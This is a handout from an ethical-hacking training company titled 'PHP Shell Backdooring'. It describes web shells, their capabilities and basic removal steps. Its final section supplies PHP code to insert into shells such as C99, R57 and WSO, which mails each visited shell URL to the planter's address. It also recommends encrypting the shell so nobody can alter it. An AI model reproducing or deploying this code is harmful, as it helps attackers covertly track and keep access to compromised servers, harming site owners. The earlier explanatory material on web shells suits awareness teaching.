SECUGENIUS SECURITY SOLUTIONS --------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile: Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses. Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters Looking at the number of Cyber Crimes since last many years, We at Secugenius Security Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank Employees, Police officials. Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the benefit of the students & making them aware of the latest trends in technological era of the Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences Secugenius provides various security solutions to its clients by securing their websites from cyber attacks. We provide training to college students, graduates and professionals in various fields. Education is delivered to students through two modes i.e. Regular mode and Distance mode which are available as short term and long term courses. In the workshops conducted by Secugenius, participants can claim to be trained by the highly experienced & skilled corporate trainers from different parts of the nation. We believe in making the base of students to be as strong as possible. All the modules have been designed in order to provide students with specialized knowledge by specialized trainers. This library was furnished, managed and funded by the Founders and Directors of Secugenius Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security Solutions.
This Online Digital Library has been initiated as a free resource & permanent resource on specialization basis for every student of Team Secugenius.
PHP Shell Backdooring Product ID No: SG/ODL/13007 Founder & Director: Harpreet Khattar & Kshitij Adhlakha Resource Person: Chetan Soni Secugenius Security Solutions SCO-13A, Model Town Extn, Near Krishna Mandir, Ludhiana-141002, Punjab – India
[email protected],
[email protected] www.secugenius.com , www.seculabs.in
WHAT IS SHELL? A shell is basically known as web shells. So web shells are the programs that are installed on the web server by an attacker, and are used to remotely access and re-configure the server without the owner's consent. They are remote access Trojans, but are also referred to as backdoors, since they offer an alternative way of accessing the website for the attacker. Most likely, the hacker stole my associate's FTP password. Once the hacker had the password, it was just a matter of uploading the shell. Then the hacker could login through the new web shell, and do just about anything they wanted to the web server. ++++++++++++++++++++++++++++++++++++++++++++ Many of these web shells allow the operator to access them through a proxy, thus hiding the location of the operator. Also, the shell can be bound to specific ports, and the information can be encrypted and hashed. ++++++++++++++++++++++++++++++++++++++++++++ This Type of Trojan provides a remote malicious user with access to the victim machine. It is a PHP script. This type of backdoor can be installed on a web server by a remote malicious user by uploading it via FTP, using the administrator's log-in details which have already been stolen. It can also be used to exploit a range of web site vulnerabilities which make it possible to upload a random file to the directory which contains the site scripts. Once this has been done, a hidden page appears on the site. Opening this page makes it possible for the malicious user to launch the backdoor and make use of its malicious functionality.
The backdoor is able to conduct the following actions on the remote server: Provide full access to files on the hard disk. Calculate a range of hashes for strings. Launch the command interpreter and bind its standard input/ output to a specific TCP port. Bind the standard input/ output of the command interpreter to data from the IRC server. View a list of processes launched on the server. Execute random PHP code. Download/ upload files from/to the server. Search the server's hard disk for files with specific content. Manage mysql databases (view/ create/ edit databases/tables). Run shell commands. Scan FTP server accounts for weak passwords (e.g. where the account name and password coincide). Delete the copy of itself from the server hard disk on command. Create a user account without password. View active users in the system. Delete records of its own activity from Apache server logs. Exploit a range of Linux kernel and bash command interpreter vulnerabilities.
Removal instructions If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program: 1. Delete the original backdoor file (the location will depend on how the program originally penetrated the victim machine). 2. Update your antivirus databases and perform a full scan of the computer (Use Any Latest Updated Anti-Virus).
Backdooring Code:$url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; mail(' Your Email ID Here', 'Shell Location', 'Someone visited the page: '.$url, 'From: Shell Victim); Put this Code in your PHP Shell like C99, R57, WSO, etc….
Example:$url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; mail('
[email protected]', 'Shell Location', 'Someone visited the page: '.$url, 'From: Victim No. 1');
Save it as WSO.php and further you can also encrypt your php shell coding so that nobody can change it For Encrypting, you can use PHP-ENCODERS http://www.rightscripts.com/phpencode/index.php